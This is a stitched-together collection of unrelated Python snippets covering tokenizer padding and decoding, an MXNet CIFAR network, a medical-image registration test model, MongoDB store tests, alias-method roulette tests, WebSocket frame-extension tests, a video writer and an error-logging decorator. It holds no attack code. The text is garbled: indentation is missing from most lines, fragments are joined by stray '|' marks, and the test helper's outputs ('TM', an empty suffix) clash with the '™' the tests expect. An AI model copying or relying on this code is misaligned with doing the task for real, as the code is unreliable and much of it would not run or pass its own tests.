encoded_inputs['attention_mask'] = (([1] * len(encoded_inputs['input_ids'])) + ([0] * difference))
if return_token_type_ids:
encoded_inputs['token_type_ids'] = (encoded_inputs['token_type_ids'] + ([self.pad_token_type_id] * difference))
if return_special_tokens_mask:
encoded_inputs['special_tokens_mask'] = (encoded_inputs['special_tokens_mask'] + ([1] * difference))
encoded_inputs['input_ids'] = (encoded_inputs['input_ids'] + ([self.pad_token_id] * difference))
elif (self.padding_side == 'left'):
if return_attention_mask:
encoded_inputs['attention_mask'] = (([0] * difference) + ([1] * len(encoded_inputs['input_ids'])))
if return_token_type_ids:
encoded_inputs['token_type_ids'] = (([self.pad_token_type_id] * difference) + encoded_inputs['token_type_ids'])
if return_special_tokens_mask:
encoded_inputs['special_tokens_mask'] = (([1] * difference) + encoded_inputs['special_tokens_mask'])
encoded_inputs['input_ids'] = (([self.pad_token_id] * difference) + encoded_inputs['input_ids'])
else:
raise ValueError(('Invalid padding strategy:' + str(self.padding_side)))
elif return_attention_mask:
encoded_inputs['attention_mask'] = ([1] * len(encoded_inputs['input_ids']))
if ((return_tensors == 'tf') and is_tf_available()):
encoded_inputs['input_ids'] = tf.constant([encoded_inputs['input_ids']])
encoded_inputs['token_type_ids'] = tf.constant([encoded_inputs['token_type_ids']])
if ('attention_mask' in encoded_inputs):
encoded_inputs['attention_mask'] = tf.constant([encoded_inputs['attention_mask']])
elif ((return_tensors == 'pt') and is_torch_available()):
encoded_inputs['input_ids'] = torch.tensor([encoded_inputs['input_ids']])
encoded_inputs['token_type_ids'] = torch.tensor([encoded_inputs['token_type_ids']])
if ('attention_mask' in encoded_inputs):
encoded_inputs['attention_mask'] = torch.tensor([encoded_inputs['attention_mask']])
elif (return_tensors is not None):
logger.warning('Unable to convert output to tensors format {}, PyTorch or TensorFlow is not available.'.format(return_tensors))
return encoded_inputs
def truncate_sequences(self, ids, pair_ids=None, num_tokens_to_remove=0, truncation_strategy='longest_first', stride=0):
if (num_tokens_to_remove <= 0):
return (ids, pair_ids, [])
if (truncation_strategy == 'longest_first'):
overflowing_tokens = []
for _ in range(num_tokens_to_remove):
if ((pair_ids is None) or (len(ids) > len(pair_ids))):
overflowing_tokens = ([ids[(- 1)]] + overflowing_tokens)
ids = ids[:(- 1)]
else:
pair_ids = pair_ids[:(- 1)]
window_len = min(len(ids), stride)
if (window_len > 0):
overflowing_tokens = (ids[(- window_len):] + overflowing_tokens)
elif (truncation_strategy == 'only_first'):
assert (len(ids) > num_tokens_to_remove)
window_len = min(len(ids), (stride + num_tokens_to_remove))
overflowing_tokens = ids[(- window_len):]
ids = ids[:(- num_tokens_to_remove)]
elif (truncation_strategy == 'only_second'):
assert ((pair_ids is not None) and (len(pair_ids) > num_tokens_to_remove))
window_len = min(len(pair_ids), (stride + num_tokens_to_remove))
overflowing_tokens = pair_ids[(- window_len):]
pair_ids = pair_ids[:(- num_tokens_to_remove)]
elif (truncation_strategy == 'do_not_truncate'):
raise ValueError('Input sequence are too long for max_length. Please select a truncation strategy.')
else:
raise ValueError("Truncation_strategy should be selected in ['longest_first', 'only_first', 'only_second', 'do_not_truncate']")
return (ids, pair_ids, overflowing_tokens)
def create_token_type_ids_from_sequences(self, token_ids_0, token_ids_1=None):
if (token_ids_1 is None):
return (len(token_ids_0) * [0])
return (([0] * len(token_ids_0)) + ([1] * len(token_ids_1)))
def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
if (token_ids_1 is None):
return token_ids_0
return (token_ids_0 + token_ids_1)
def get_special_tokens_mask(self, token_ids_0, token_ids_1=None, already_has_special_tokens=False):
return ([0] * ((len(token_ids_1) if token_ids_1 else 0) + len(token_ids_0)))
def convert_ids_to_tokens(self, ids, skip_special_tokens=False):
if isinstance(ids, int):
if (ids in self.added_tokens_decoder):
return self.added_tokens_decoder[ids]
else:
return self._convert_id_to_token(ids)
tokens = []
for index in ids:
index = int(index)
if (skip_special_tokens and (index in self.all_special_ids)):
continue
if (index in self.added_tokens_decoder):
tokens.append(self.added_tokens_decoder[index])
else:
tokens.append(self._convert_id_to_token(index))
return tokens
def _convert_id_to_token(self, index):
raise NotImplementedError
    def convert_tokens_to_string(self, tokens):
        return ' '.join(tokens)
def decode(self, token_ids, skip_special_tokens=False, clean_up_tokenization_spaces=True):
filtered_tokens = self.convert_ids_to_tokens(token_ids, skip_special_tokens=skip_special_tokens)
sub_texts = []
current_sub_text = []
for token in filtered_tokens:
            if (skip_special_tokens and (token in self.all_special_tokens)):
continue
if (token in self.added_tokens_encoder):
if current_sub_text:
sub_texts.append(self.convert_tokens_to_string(current_sub_text))
current_sub_text = []
sub_texts.append(token)
else:
current_sub_text.append(token)
if current_sub_text:
sub_texts.append(self.convert_tokens_to_string(current_sub_text))
text = ' '.join(sub_texts)
if clean_up_tokenization_spaces:
clean_text = self.clean_up_tokenization(text)
return clean_text
else:
return text
    @property
    def special_tokens_map(self):
set_attr = {}
for attr in self.SPECIAL_TOKENS_ATTRIBUTES:
attr_value = getattr(self, ('_' + attr))
if attr_value:
set_attr[attr] = attr_value
return set_attr
    @property
    def all_special_tokens(self):
all_toks = []
set_attr = self.special_tokens_map
for attr_value in set_attr.values():
all_toks = (all_toks + (list(attr_value) if isinstance(attr_value, (list, tuple)) else [attr_value]))
all_toks = list(set(all_toks))
return all_toks
    @property
    def all_special_ids(self):
all_toks = self.all_special_tokens
all_ids = self.convert_tokens_to_ids(all_toks)
return all_ids
    @staticmethod
    def clean_up_tokenization(out_string):
out_string = out_string.replace(' .', '.').replace(' ?', '?').replace(' !', '!').replace(' ,', ',').replace(" ' ", "'").replace(" n't", "n't").replace(" 'm", "'m").replace(' do not', " don't").replace(" 's", "'s").replace(" 've", "'ve").replace(" 're", "'re")
        return out_string
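# Hedged sketch of the subclass contract: a toy whitespace tokenizer filling in
# the NotImplementedError hooks above. The class name and vocab handling are
# illustrative only, not part of the library.
class WhitespaceTokenizer(PreTrainedTokenizer):
    def __init__(self, vocab, **kwargs):
        super().__init__(**kwargs)
        self.vocab = vocab
        self.ids_to_tokens = {i: t for (t, i) in vocab.items()}
    @property
    def vocab_size(self):
        return len(self.vocab)
    def _tokenize(self, text, **kwargs):
        return text.split()
    def _convert_token_to_id(self, token):
        return self.vocab.get(token, self.vocab.get(self.unk_token))
    def _convert_id_to_token(self, index):
        return self.ids_to_tokens.get(index)
# tok = WhitespaceTokenizer({'hello': 0, '[UNK]': 1}, unk_token='[UNK]')
# tok.encode('hello world', add_special_tokens=False)  # -> [0, 1]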
class CIFARQuick(HybridBlock):
def __init__(self, block, fix_layers, pooling, channels, classes, fix_conv=False, **kwargs):
super(CIFARQuick, self).__init__()
self.fix_conv = fix_conv
self.fix_layers = fix_layers
assert ('fw' in kwargs.keys()), 'no_fw'
self.fw = kwargs['fw']
assert ('fix_fc' in kwargs.keys()), 'no_fix_fc'
self.fix_fc = kwargs['fix_fc']
with self.name_scope():
self.feats1 = nn.HybridSequential()
self.feats1.add(block(channels[0], 5, 1, 2, pooling[0]))
self.feats2 = nn.HybridSequential()
self.feats2.add(block(channels[1], 5, 1, 2, pooling[1]))
self.feats3 = nn.HybridSequential()
self.feats3.add(block(channels[2], 5, 1, 2, pooling[2]))
self.feats3.add(nn.Flatten())
self.fc1 = nn.Dense(64, use_bias=False)
self.fc2 = nn.Dense(classes, use_bias=False)
self.fc3 = nn.Dense(5, use_bias=False)
self.fc4 = nn.Dense(5, use_bias=False)
self.fc5 = nn.Dense(5, use_bias=False)
self.fc6 = nn.Dense(5, use_bias=False)
self.fc7 = nn.Dense(5, use_bias=False)
self.fc8 = nn.Dense(5, use_bias=False)
self.fc9 = nn.Dense(5, use_bias=False)
self.fc10 = nn.Dense(5, use_bias=False)
def hybrid_forward(self, F, x, num=0, fix_conv=False):
if (self.fix_layers == 0):
out = F.L2Normalization(self.fc1(self.feats3(self.feats2(self.feats1(x)))))
elif (self.fix_layers == 1):
with ag.pause():
x = self.feats1(x)
out = F.L2Normalization(self.fc1(self.feats3(self.feats2(x))))
elif (self.fix_layers == 2):
with ag.pause():
x = self.feats2(self.feats1(x))
out = F.L2Normalization(self.fc1(self.feats3(x)))
elif (self.fix_layers == 3):
if self.fix_fc:
with ag.pause():
x = self.fc1(self.feats3(self.feats2(self.feats1(x))))
out = F.L2Normalization(x)
else:
with ag.pause():
x = self.feats3(self.feats2(self.feats1(x)))
out = F.L2Normalization(self.fc1(x))
if self.fw:
for i in range((num + 1)):
if (i < num):
with ag.pause():
                        fc = getattr(self, 'fc' + str(i + 2))
if (i == 0):
output = fc(out)
else:
output = mx.nd.concat(output, fc(out), dim=1)
else:
                    fc = getattr(self, 'fc' + str(i + 2))
if (i == 0):
output = fc(out)
else:
output = mx.nd.concat(output, fc(out), dim=1)
return (out, output)
else:
for i in range((num + 1)):
                fc = getattr(self, 'fc' + str(i + 2))
if (i == 0):
output = fc(out)
else:
output = mx.nd.concat(output, fc(out), dim=1)
            return (out, output)
class TestModel(BaseModel):
def name(self):
return 'TestModel'
    @staticmethod
    def modify_commandline_options(parser, is_train=True):
assert (not is_train), 'TestModel cannot be used in train mode'
parser = CycleGANModel.modify_commandline_options(parser, is_train=False)
parser.set_defaults(dataset_mode='single')
parser.set_defaults(pool_size=0, no_lsgan=True, norm='batch')
parser.add_argument('--model_suffix', type=str, default='', help='In checkpoints_dir, [which_epoch]_net_G[model_suffix].pth will be loaded as the generator of TestModel')
return parser
def initialize(self, opt):
assert (not opt.isTrain)
BaseModel.initialize(self, opt)
self.loss_names = []
self.visual_names = ['real_A', 'fake_B']
self.model_names = [('G' + opt.model_suffix)]
if (opt.which_model_netG == 'vnet'):
self.netG = VNet()
self.netG.to(self.device)
self.netG = torch.nn.DataParallel(self.netG, self.gpu_ids)
elif (opt.which_model_netG == 'motion'):
self.netG = Net_3d_Test()
self.netG.to(self.device)
self.netG = torch.nn.DataParallel(self.netG, self.gpu_ids)
elif (opt.which_model_netG == 'unet3d'):
self.netG = UNet3D_FLOW_no(2, 3)
self.netG.to(self.device)
self.netG = torch.nn.DataParallel(self.netG, self.gpu_ids)
elif (opt.which_model_netG == 'unet3d_deep'):
self.netG = UNet3D_deep(1, 2)
self.netG.to(self.device)
self.netG = torch.nn.DataParallel(self.netG, self.gpu_ids)
else:
self.netG = networks.define_G((opt.input_nc * 3), (opt.output_nc * 2), opt.ngf, opt.which_model_netG, opt.norm, (not opt.no_dropout), opt.init_type, opt.init_gain, self.gpu_ids)
setattr(self, ('netG' + opt.model_suffix), self.netG)
if ((opt.which_model_netG == 'vnet') or (opt.which_model_netG == 'unet3d_deep')):
self.netG.load_state_dict(torch.load(opt.net3d_dir_G))
elif ((opt.which_model_netG == 'vnet3d') or (opt.which_model_netG == 'motion')):
self.netG.load_state_dict(torch.load(opt.net3d_dir_G))
else:
self.load_networks(opt.which_epoch)
self.print_networks(opt.verbose)
def set_input(self, combined_image1, combined_image2, move_image, fix_image):
self.combined_image1 = combined_image1.to(self.device)
self.move_image = move_image.to(self.device)
self.combined_image2 = combined_image2.to(self.device)
self.fix_image = fix_image.to(self.device)
def test(self):
(field12, field21) = self.netG(self.combined_image1, self.combined_image2, self.move_image, self.fix_image)
        return (field12, field21)
class MongoStoreTests(TestCase):
def setUp(self):
self.db_hosts = ['localhost']
self.db_name = ('coal-mine-test-' + str(uuid.uuid4()))
self.db_conn = MongoClient()
self.db = self.db_conn[self.db_name]
self.store = MongoStore(self.db_hosts, self.db_name, None, None)
def tearDown(self):
self.db_conn.drop_database(self.db)
def test_create(self):
self.store.create({'id': 'abcdefgh'})
def test_update_noop(self):
self.store.create({'id': 'abcdefgh'})
self.store.update('abcdefgh', {})
def test_update_set(self):
self.store.create({'id': 'abcdefgh'})
self.store.update('abcdefgh', {'periodicity': 10})
self.assertEqual(self.store.get('abcdefgh')['periodicity'], 10)
def test_update_unset(self):
self.store.create({'id': 'abcdefgh'})
self.store.update('abcdefgh', {'periodicity': 10})
self.store.update('abcdefgh', {'periodicity': None})
self.assertNotIn('periodicity', self.store.get('abcdefgh'))
def test_get_nonexistent(self):
with self.assertRaises(KeyError):
self.store.get('abcdefgh')
def test_list(self):
self.store.create({'id': 'abcdefgh', 'name': 'freedle', 'periodicity': 600, 'paused': False, 'late': False})
iterator = self.store.list()
next(iterator)
with self.assertRaises(StopIteration):
next(iterator)
next(self.store.list(verbose=True))
next(self.store.list(paused=False))
next(self.store.list(late=False))
next(self.store.list(order_by='deadline'))
next(self.store.list(search='freedle'))
def test_upcoming_deadlines(self):
self.store.create({'id': 'abcdefgh', 'paused': False, 'late': False})
next(self.store.upcoming_deadlines())
def test_delete(self):
self.store.create({'id': 'abcdefgh'})
self.store.delete('abcdefgh')
with self.assertRaises(KeyError):
self.store.delete('abcdefgh')
def test_find_identifier(self):
self.store.create({'id': 'abcdefgh', 'slug': 'froodle'})
self.assertEqual(self.store.find_identifier('froodle'), 'abcdefgh')
with self.assertRaises(KeyError):
            self.store.find_identifier('freedle')
class PreprocessForEfficientRouletteSelectionTest(unittest.TestCase):
def assertPreprocess(self, weights):
(alternates, keep_chances) = _preprocess_for_efficient_roulette_selection(weights)
self.assertEqual(len(alternates), len(keep_chances))
target_weight = (sum(weights) // len(alternates))
distribution = list(keep_chances)
for i in range(len(alternates)):
distribution[alternates[i]] += (target_weight - keep_chances[i])
self.assertEqual(weights, distribution)
return (alternates, keep_chances)
def test_fuzz(self):
random.seed(8)
for _ in range(100):
n = random.randint(1, 50)
weights = [random.randint(0, 100) for _ in range(n)]
weights[(- 1)] += (n - (sum(weights) % n))
self.assertPreprocess(weights)
def test_validation(self):
with self.assertRaises(ValueError):
_ = self.assertPreprocess(weights=[])
with self.assertRaises(ValueError):
_ = self.assertPreprocess(weights=[1, 2])
with self.assertRaises(ValueError):
_ = self.assertPreprocess(weights=[3, 3, 2])
def test_already_uniform(self):
self.assertEqual(self.assertPreprocess(weights=[1]), ([0], [0]))
self.assertEqual(self.assertPreprocess(weights=[1, 1]), ([0, 1], [0, 0]))
self.assertEqual(self.assertPreprocess(weights=[1, 1, 1]), ([0, 1, 2], [0, 0, 0]))
self.assertEqual(self.assertPreprocess(weights=[2, 2, 2]), ([0, 1, 2], [0, 0, 0]))
def test_donation(self):
self.assertEqual(self.assertPreprocess(weights=[1, 2, 3]), ([2, 1, 2], [1, 0, 0]))
self.assertEqual(self.assertPreprocess(weights=[3, 1, 2]), ([0, 0, 2], [0, 1, 0]))
self.assertEqual(self.assertPreprocess(weights=[5, 1, 0]), ([0, 0, 0], [0, 1, 0]))
def test_over_donation(self):
        self.assertEqual(self.assertPreprocess(weights=[3, 0, 3]), ([2, 0, 2], [1, 0, 0]))
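# Note on the invariant assertPreprocess checks: this is the alias-method
# (roulette) property, i.e. routing each slot i's donation of
# (target_weight - keep_chances[i]) to alternates[i] must reconstruct the
# original weight vector exactly.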
def patchify_augmentation(args, batch):
aug_batch = dict()
img = batch['image']
label = batch['label']
batch_size = img.size()[0]
patch_dim = (img.size()[(- 1)] // args.mask_patch_size)
images_patch = rearrange(img, 'b c (h p1) (w p2) (d p3) -> (b h w d) c p1 p2 p3 ', p1=(args.mask_patch_size // 2), p2=args.mask_patch_size, p3=args.mask_patch_size)
labels_patch = rearrange(label, 'b c (h p1) (w p2) (d p3) -> (b h w d) c p1 p2 p3 ', p1=(args.mask_patch_size // 2), p2=args.mask_patch_size, p3=args.mask_patch_size)
mask = np.ones(images_patch.size()[0])
if args.add_contrast_mask:
num_patches = (images_patch.shape[0] // (args.mask_scale ** 3))
num_mask = int((args.mask_ratio * num_patches))
mask_index = np.random.permutation(num_patches)[:num_mask]
mask = np.zeros(num_patches, dtype=int)
mask[mask_index] = 1
mask = mask.reshape(batch_size, (patch_dim // args.mask_scale), (patch_dim // args.mask_scale), (patch_dim // args.mask_scale))
if (args.mask_scale > 1):
mask = mask.repeat(args.mask_scale, axis=1).repeat(args.mask_scale, axis=2).repeat(args.mask_scale, axis=3)
mask = mask.reshape((- 1))
noise_mask = torch.normal(mean=torch.zeros((num_mask * (args.mask_scale ** 3)), 1, (args.mask_patch_size // 2), args.mask_patch_size, args.mask_patch_size), std=(0.1 * torch.ones((num_mask * (args.mask_scale ** 3)), 1, (args.mask_patch_size // 2), args.mask_patch_size, args.mask_patch_size)))
images_patch[(mask == 1)] = noise_mask
aug_list = get_augmentation(args)
aug_batch['image'] = images_patch
aug_batch['label'] = labels_patch
aug_batch = aug_list(aug_batch)
feature_size = (img.shape[2] // args.mask_patch_size)
aug_batch['image'] = rearrange(aug_batch['image'], '(b h w d) c p1 p2 p3 -> b c (h p1) (w p2) (d p3)', h=patch_dim, w=patch_dim, d=patch_dim)
aug_batch['label'] = rearrange(aug_batch['label'], '(b h w d) c p1 p2 p3 -> b c (h p1) (w p2) (d p3)', h=patch_dim, w=patch_dim, d=patch_dim)
    return (aug_batch, mask)
def test_clip_column():
assert (_utils.clip_column(0, [], 0) == 0)
assert (_utils.clip_column(2, ['123'], 0) == 2)
assert (_utils.clip_column(3, ['123'], 0) == 3)
assert (_utils.clip_column(5, ['123'], 0) == 3)
assert (_utils.clip_column(0, ['\n', '123'], 0) == 0)
assert (_utils.clip_column(1, ['\n', '123'], 0) == 0)
assert (_utils.clip_column(2, ['123\n', '123'], 0) == 2)
assert (_utils.clip_column(3, ['123\n', '123'], 0) == 3)
    assert (_utils.clip_column(4, ['123\n', '123'], 1) == 3)
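# A minimal sketch of what _utils.clip_column appears to do, inferred purely
# from the assertions above (not the library's actual implementation): clamp a
# column index to the last addressable column of lines[row], where a trailing
# newline does not count as a column.
def clip_column_sketch(col, lines, row):
    if not lines:
        return 0
    line = lines[row]
    max_col = len(line) - 1 if line.endswith('\n') else len(line)
    return min(col, max_col)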
def new_export_path_for_album(album_id: AlbumId) -> Path:
stem = f'{album_id.title} - {album_id.artist}'
path = Path(join_path_with_escaped_name_of_legal_length(str(EXPORT_DIR_PATH), stem, EXPORT_EXTENSION))
trim_count = 1
while path.exists():
new_stem = (path.stem[:(- trim_count)] + uuid.uuid4().hex[:trim_count])
trim_count += 1
path = path.with_name(f'{new_stem}.{EXPORT_EXTENSION}')
    return path
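# Collision-handling note: each retry swaps one more trailing stem character
# for random hex (trim_count grows by 1 per attempt), so candidate names
# diverge from existing files quickly.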
def fix_lyft(root_folder='./data/lyft', version='v1.01'):
lidar_path = 'lidar/host-a011_lidar1_.bin'
root_folder = os.path.join(root_folder, f'{version}-train')
lidar_path = os.path.join(root_folder, lidar_path)
assert os.path.isfile(lidar_path), f'Please download the complete Lyft dataset and make sure {lidar_path} is present.'
points = np.fromfile(lidar_path, dtype=np.float32, count=(- 1))
try:
points.reshape([(- 1), 5])
print(f'This fix is not required for version {version}.')
except ValueError:
new_points = np.array((list(points) + [100.0, 1.0]), dtype='float32')
new_points.tofile(lidar_path)
        print(f'Appended 100.0 and 1.0 to the end of {lidar_path}.')
class FilterLogoPlacementsSerializer(serializers.Serializer):
publisher = serializers.ChoiceField(choices=[(c.value, c.name.replace('_', ' ').title()) for c in PublisherChoices], required=False)
flight = serializers.ChoiceField(choices=[(c.value, c.name.replace('_', ' ').title()) for c in LogoPlacementChoices], required=False)
    @property
    def by_publisher(self):
        return self.validated_data.get('publisher')
    @property
    def by_flight(self):
        return self.validated_data.get('flight')
    def skip_logo(self, logo):
        if (self.by_publisher and (self.by_publisher != logo.publisher)):
            return True
        if (self.by_flight and (self.by_flight != logo.logo_place)):
            return True
        return False
class MatchedMolecularPair(object):
__slots__ = ('id1', 'id2', 'smirks', 'constant_smiles', 'min_constant_radius', 'max_constant_radius')
def __init__(self, id1, id2, smirks, constant_smiles, min_constant_radius, max_constant_radius):
self.id1 = id1
self.id2 = id2
self.smirks = smirks
self.constant_smiles = constant_smiles
self.min_constant_radius = min_constant_radius
        self.max_constant_radius = max_constant_radius
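# Design note: __slots__ avoids per-instance __dict__ overhead, which matters
# when enumerating very large numbers of matched molecular pairs. Hypothetical
# (illustrative) construction:
# pair = MatchedMolecularPair('id1', 'id2', '[*:1]O>>[*:1]N', 'c1ccccc1[*:1]', 0, 3)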
class TestFrameDecoderExtensions():
class FakeExtension(wpext.Extension):
name = 'fake'
def __init__(self) -> None:
self._inbound_header_called = False
self._inbound_rsv_bit_set = False
self._inbound_payload_data_called = False
self._inbound_complete_called = False
self._fail_inbound_complete = False
self._outbound_rsv_bit_set = False
def enabled(self) -> bool:
return True
def offer(self) -> Union[(bool, str)]:
return 'fake'
def frame_inbound_header(self, proto: Union[(fp.FrameDecoder, fp.FrameProtocol)], opcode: fp.Opcode, rsv: fp.RsvBits, payload_length: int) -> Union[(fp.CloseReason, fp.RsvBits)]:
self._inbound_header_called = True
if (opcode is fp.Opcode.PONG):
return fp.CloseReason.MANDATORY_EXT
self._inbound_rsv_bit_set = rsv.rsv3
return fp.RsvBits(False, False, True)
def frame_inbound_payload_data(self, proto: Union[(fp.FrameDecoder, fp.FrameProtocol)], data: bytes) -> Union[(bytes, fp.CloseReason)]:
self._inbound_payload_data_called = True
if (data == b'party time'):
return fp.CloseReason.POLICY_VIOLATION
elif (data == b'ragequit'):
self._fail_inbound_complete = True
if self._inbound_rsv_bit_set:
data = data.decode('utf-8').upper().encode('utf-8')
return data
def frame_inbound_complete(self, proto: Union[(fp.FrameDecoder, fp.FrameProtocol)], fin: bool) -> Union[(bytes, fp.CloseReason, None)]:
self._inbound_complete_called = True
if self._fail_inbound_complete:
return fp.CloseReason.ABNORMAL_CLOSURE
if (fin and self._inbound_rsv_bit_set):
return 'TM'.encode()
return None
def frame_outbound(self, proto: Union[(fp.FrameDecoder, fp.FrameProtocol)], opcode: fp.Opcode, rsv: fp.RsvBits, data: bytes, fin: bool) -> Tuple[(fp.RsvBits, bytes)]:
if (opcode is fp.Opcode.TEXT):
rsv = fp.RsvBits(rsv.rsv1, rsv.rsv2, True)
self._outbound_rsv_bit_set = True
if (fin and self._outbound_rsv_bit_set):
data += ''.encode()
self._outbound_rsv_bit_set = False
return (rsv, data)
def test_rsv_bit(self) -> None:
ext = self.FakeExtension()
decoder = fp.FrameDecoder(client=True, extensions=[ext])
frame_bytes = b'\x91\x00'
decoder.receive_bytes(frame_bytes)
frame = decoder.process_buffer()
assert (frame is not None)
assert ext._inbound_header_called
assert ext._inbound_rsv_bit_set
def test_wrong_rsv_bit(self) -> None:
ext = self.FakeExtension()
decoder = fp.FrameDecoder(client=True, extensions=[ext])
frame_bytes = b'\xa1\x00'
decoder.receive_bytes(frame_bytes)
with pytest.raises(fp.ParseFailed) as excinfo:
decoder.receive_bytes(frame_bytes)
decoder.process_buffer()
assert (excinfo.value.code is fp.CloseReason.PROTOCOL_ERROR)
def test_header_error_handling(self) -> None:
ext = self.FakeExtension()
decoder = fp.FrameDecoder(client=True, extensions=[ext])
frame_bytes = b'\x9a\x00'
decoder.receive_bytes(frame_bytes)
with pytest.raises(fp.ParseFailed) as excinfo:
decoder.receive_bytes(frame_bytes)
decoder.process_buffer()
assert (excinfo.value.code is fp.CloseReason.MANDATORY_EXT)
def test_payload_processing(self) -> None:
ext = self.FakeExtension()
decoder = fp.FrameDecoder(client=True, extensions=[ext])
payload = 'fnor'
expected_payload = payload.upper().encode('utf-8')
bytes_payload = payload.encode('utf-8')
frame_bytes = ((b'\x11' + bytearray([len(bytes_payload)])) + bytes_payload)
decoder.receive_bytes(frame_bytes)
frame = decoder.process_buffer()
assert (frame is not None)
assert ext._inbound_header_called
assert ext._inbound_rsv_bit_set
assert ext._inbound_payload_data_called
assert (frame.payload == expected_payload)
def test_no_payload_processing_when_not_wanted(self) -> None:
ext = self.FakeExtension()
decoder = fp.FrameDecoder(client=True, extensions=[ext])
payload = 'fnor'
expected_payload = payload.encode('utf-8')
bytes_payload = payload.encode('utf-8')
frame_bytes = ((b'\x01' + bytearray([len(bytes_payload)])) + bytes_payload)
decoder.receive_bytes(frame_bytes)
frame = decoder.process_buffer()
assert (frame is not None)
assert ext._inbound_header_called
assert (not ext._inbound_rsv_bit_set)
assert ext._inbound_payload_data_called
assert (frame.payload == expected_payload)
def test_payload_error_handling(self) -> None:
ext = self.FakeExtension()
decoder = fp.FrameDecoder(client=True, extensions=[ext])
payload = b'party time'
frame_bytes = ((b'\x91' + bytearray([len(payload)])) + payload)
decoder.receive_bytes(frame_bytes)
with pytest.raises(fp.ParseFailed) as excinfo:
decoder.receive_bytes(frame_bytes)
decoder.process_buffer()
assert (excinfo.value.code is fp.CloseReason.POLICY_VIOLATION)
def test_frame_completion(self) -> None:
ext = self.FakeExtension()
decoder = fp.FrameDecoder(client=True, extensions=[ext])
payload = 'fnor'
expected_payload = (payload + 'TM').upper().encode('utf-8')
bytes_payload = payload.encode('utf-8')
frame_bytes = ((b'\x91' + bytearray([len(bytes_payload)])) + bytes_payload)
decoder.receive_bytes(frame_bytes)
frame = decoder.process_buffer()
assert (frame is not None)
assert ext._inbound_header_called
assert ext._inbound_rsv_bit_set
assert ext._inbound_payload_data_called
assert ext._inbound_complete_called
assert (frame.payload == expected_payload)
def test_no_frame_completion_when_not_wanted(self) -> None:
ext = self.FakeExtension()
decoder = fp.FrameDecoder(client=True, extensions=[ext])
payload = 'fnor'
expected_payload = payload.encode('utf-8')
bytes_payload = payload.encode('utf-8')
frame_bytes = ((b'\x81' + bytearray([len(bytes_payload)])) + bytes_payload)
decoder.receive_bytes(frame_bytes)
frame = decoder.process_buffer()
assert (frame is not None)
assert ext._inbound_header_called
assert (not ext._inbound_rsv_bit_set)
assert ext._inbound_payload_data_called
assert ext._inbound_complete_called
assert (frame.payload == expected_payload)
def test_completion_error_handling(self) -> None:
ext = self.FakeExtension()
decoder = fp.FrameDecoder(client=True, extensions=[ext])
payload = b'ragequit'
frame_bytes = ((b'\x91' + bytearray([len(payload)])) + payload)
decoder.receive_bytes(frame_bytes)
with pytest.raises(fp.ParseFailed) as excinfo:
decoder.receive_bytes(frame_bytes)
decoder.process_buffer()
assert (excinfo.value.code is fp.CloseReason.ABNORMAL_CLOSURE)
def test_outbound_handling_single_frame(self) -> None:
ext = self.FakeExtension()
proto = fp.FrameProtocol(client=False, extensions=[ext])
payload = ''
data = proto.send_data(payload, fin=True)
payload_bytes = (payload + '').encode('utf8')
assert (data == ((b'\x91' + bytearray([len(payload_bytes)])) + payload_bytes))
def test_outbound_handling_multiple_frames(self) -> None:
ext = self.FakeExtension()
proto = fp.FrameProtocol(client=False, extensions=[ext])
payload = ''
data = proto.send_data(payload, fin=False)
payload_bytes = payload.encode('utf8')
assert (data == ((b'\x11' + bytearray([len(payload_bytes)])) + payload_bytes))
payload = '¯\\_(ツ)_/¯'
data = proto.send_data(payload, fin=True)
payload_bytes = (payload + '™').encode('utf8')
assert (data == ((b'\x80' + bytearray([len(payload_bytes)])) + payload_bytes)) |
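# The FakeExtension referenced by these tests is not part of this excerpt. Below is
# a reconstruction inferred purely from the assertions above, written against
# wsproto's extension hooks (wsproto.extensions.Extension, assumed imported as
# wpext; fp is the frame_protocol module used above). The real test helper may
# differ in detail; this is a sketch, not the original.
class SketchExtension(wpext.Extension):
    name = 'fake'
    _inbound_header_called = False
    _inbound_rsv_bit_set = False
    _inbound_payload_data_called = False
    _inbound_complete_called = False
    _last_payload = b''
    def enabled(self):
        return True
    def frame_inbound_header(self, proto, opcode, rsv, payload_length):
        self._inbound_header_called = True
        self._inbound_rsv_bit_set = rsv.rsv3
        return fp.RsvBits(False, False, True)  # claim rsv3 so the 0x91/0x11 frames parse
    def frame_inbound_payload_data(self, proto, data):
        self._inbound_payload_data_called = True
        self._last_payload = data
        if data == b'party time':
            return fp.CloseReason.POLICY_VIOLATION  # matches test_payload_error_handling
        if self._inbound_rsv_bit_set:
            data = data.decode('utf-8').upper().encode('utf-8')  # uppercase when rsv3 was set
        return data
    def frame_inbound_complete(self, proto, fin):
        self._inbound_complete_called = True
        if self._last_payload == b'ragequit':
            return fp.CloseReason.ABNORMAL_CLOSURE  # matches test_completion_error_handling
        if fin and self._inbound_rsv_bit_set:
            return '™'.encode('utf-8')  # suffix expected by test_frame_completion
        return None
    def frame_outbound(self, proto, opcode, rsv, data, fin):
        if fin:
            data += '™'.encode('utf-8')  # suffix expected by the outbound tests
        if opcode is not fp.Opcode.CONTINUATION:
            rsv = fp.RsvBits(rsv.rsv1, rsv.rsv2, True)  # rsv bits only on a message's first frame
        return rsv, data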
def save_video(video_frames, filename):
import cv2
_make_dir(filename)
video_frames = np.flip(video_frames, axis=(- 1))  # flip the channel axis: RGB -> BGR, the order OpenCV expects
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
fps = 30.0
(height, width, _) = video_frames[0].shape
writer = cv2.VideoWriter(filename, fourcc, fps, (width, height))
for video_frame in video_frames:
writer.write(video_frame)
writer.release() |
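# Usage sketch for save_video above (illustrative values: 30 black 320x240 RGB
# frames; assumes numpy is imported as np and _make_dir exists as used above):
demo_frames = np.zeros((30, 240, 320, 3), dtype=np.uint8)
save_video(demo_frames, 'out/demo.avi')  # writes an MJPG-encoded AVI at 30 fps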
class ErrorHandling():
_error_messages = []
@classmethod
def error_logging(cls, func):
logger = qf_logger.getChild(__class__.__name__)
def wrapped_function(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
error_message = '{}: An error occurred while processing the function {}.\n {}'.format(e.__class__.__name__, func.__name__, traceback.format_exc())
logger.error(error_message)
cls._error_messages.append(error_message)
return wrapped_function
@classmethod
def class_error_logging(cls):
def wrap(wrapped_cls):
for (function_name, function) in inspect.getmembers(wrapped_cls, inspect.isfunction):
setattr(wrapped_cls, function_name, cls.error_logging(function))
return wrapped_cls
return wrap
@classmethod
def get_error_messages(cls):
return cls._error_messages
@classmethod
def reset_error_messages(cls):
old_messages = cls._error_messages
cls._error_messages = []
return old_messages |
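# Usage sketch: decorate a class so every method logs-and-swallows exceptions
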